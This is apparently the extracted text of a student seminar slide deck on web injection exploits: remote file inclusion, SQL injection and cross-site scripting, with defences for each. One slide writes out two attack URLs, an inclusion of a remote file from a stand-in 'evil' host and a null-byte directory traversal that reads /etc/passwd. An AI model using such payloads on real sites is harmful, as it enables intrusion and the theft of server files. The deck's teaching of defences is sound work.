Master Semminar Injection Exploits

8/8/2019 Master Semminar Injection Exploits

1/24

Web securityWeb security -- Injection exploitsInjection exploits

Karol Stpniewski


2/24

Presentation topicsPresentation topics

What are Injection exploits

Why they are dangerous?

Basic types of Injection exploits

Remote file injection

Cross-site scripting

SQL Injection

Other

Examples of securing application againstexploits


3/24

Injection exploitInjection exploit what's that?what's that? What is Exploit?

Piece of software or sequence of commands,which causes unintended behaviour to occur on

computer software.

Usually based on bugs or other vulnerability whichexist in computer application.

Possible effects of using exploit:

privilege escalation Denial of service

Gaining control of the system


4/24

Injection exploitInjection exploit what's that?what's that? Injection exploit uses some input or data entry feature to

introduce some kind of data or code that subverts theintended operation of the system.

Usually these exploits exploit vulnerabilities resulting frominsufficient data validation on input and so forth.

The way of injecting the code classifies exploits incategories.

1st

place in OWASP TOP10 ranking of Web applicationexploits.

Used to attack IBM, Yahoo, Apple,...


5/24

Remote file inclusionRemote file inclusion allows an attacker to include a remote file usually through a

script on the web server.

most often found on websites based on scripting languages

like PHP, ASP etc.

can lead to

Code execution on the web server

Code execution on the client-side such as

Javascript which can lead to other attacks such ascross site scripting (XSS).

Denial of Service (DoS)

Data Theft/Manipulation


6/24

Remote file inclusionRemote file inclusion -- exampleexampleTrivial example: We want to

include the file based onwhat color user have

chosen in form. We coulduse the followingconstruction: (PHP andHTML code). We give useronly two options, red andblue. Form is passed to

server using GET method.


7/24

Remote file inclusionRemote file inclusion -- exampleexample

If user finds out (what is relatively simple for GET method) howto change possible values, he can provide own file to include,or can even tell server to include its own files, which normally

shouldn't be available outside the server system.

Examples:

/vulnerable.php?COLOR=http://evil/exploit? - injects a remotely hostedfile containing an exploit.

/vulnerable.php?COLOR=../../../../../../../../etc/passwd%00- allows anattacker to read the contents of the passwd file on a UNIX systemdirectory traversal.

%00 is a NULL meta character which removes the .php suffix which is

added in script.


8/24

Remote file inclusionRemote file inclusion RFI is very common exploit for different CMS

and other applications which provide plugin

systems, downloading and uploading manyfiles etc.

Even many commercial cms wherevulnarable for RFI


9/24

Remote file inclusionRemote file inclusion how tohow to

defenddefend Remove instructions which add files which

names are taken directly from variables

use prepared set of possible files (choosingwith conditional instructions).

Read privilleges on server only for filesneeded on website.

On some server systems (e.g. BSD-like) use jails for server filesystem.


10/24

SQL InjectionSQL Injection What's that?

Most popular injection exploit

Every application which uses SQL-baseddatabase might be vulnerable

However, if there is no SQL there is no danger.

Happens when user input is not properly validatedand escaped


11/24

SQL InjectionSQL Injection -- exampleexample

We want to create simple login form. User provides login andpassword, and we check if such user exists in database. However,user provides data which is control instruction for database. User

gets logged in without providing correct password.


12/24

SQL InjectionSQL Injection possible effectspossible effects

What could happen?

Illegal access to application

Access to whole data in database

Denial of Service

Abillity to modify data

Abillity to execute code on server

Extremely dangerous exploit


13/24

How to defend against SQLHow to defend against SQL

InjectionInjection Prepared statements

Seperates data from statement

Statement is compiled, and might be used many times. Before compilation we place marks instead of data

values.

After compilation we bind the data with the statement,replacing marks with data values.

It's not always possible to use such statements (specialtypes of data)


14/24


InjectionInjection Prepared statements

Example


15/24


InjectionInjection Escaping

Every special character in provided data is

replaced with escaping sequence (e.g. ' isreplaced with '' or \' ).

It's still error-prone

Escaping sequences depend on databaseused

It's based on blacklisting special chars,which is not optimal solution


16/24


InjectionInjection Escaping

Example of escaping in PHP code using built-in functionfor MySQL database.


17/24


InjectionInjection Stored procedures

SQL statements are moved from script to database andsaved as procedure

Procedure is invoked with data as parameters, hasdefined output

It's not enough, we still need to separate data fromstatement in procedure

Main rule do not mix data with code


18/24


InjectionInjection Stored procedures

Example of safe stored procedure in MySQL database

Prepared statement is used here as well.


19/24


InjectionInjection Other important things

Validating data

Check if age is a number, city name is a simple string, etc. Filtering bad data e.g. Remove letters from phone number

Executing statements on account with minimal privillagesneeded for that operation

Regular updates of database system Good database project


20/24

CrossCross--site scripting (XSS)site scripting (XSS)

XSS exploit is based on injecting the code into website,which then is displayed by other users.

Web browsers security policies do not allow scripts towork on data other than data coming from the sameserver which script comes from.

When code is injected to the website, it works on thesame data as the website does.

Attacker is able to grab session data, cookies, andother important information


21/24

CrossCross--site scripting (XSS)site scripting (XSS)

exploit scenarios

Internet boards user adds new post,

which includes script with malicious code. Ifcontent of new post is not properlyvalidated, every user who reads post alsoexecutes script, which might steal hiscookies, session data, etc.

Also possible using RFI method


22/24

CrossCross--site scripting (XSS)site scripting (XSS) howhow

to defendto defend Validating and filtering the data

No strange chars are allowed

All control symbols are removed

Escaping HTML tags and JS symbols

Before displaying, website should replacecontrol symbols with entities.

Defending on client side

Block malicious scripts (using NoScript-likeaddons, etc.)


23/24

Other injection exploitsOther injection exploits

Frame injection Only on IE5,6,7

HTTP header injection

E-mail injection might be used toanonymously send e-mails via forms onpublic website


24/24

That's allThank you!

Date post:	09-Apr-2018
Category:	Documents
Upload:	karol-stepniewski
View:	217 times
Download:	0 times

Master Semminar Injection Exploits

Documents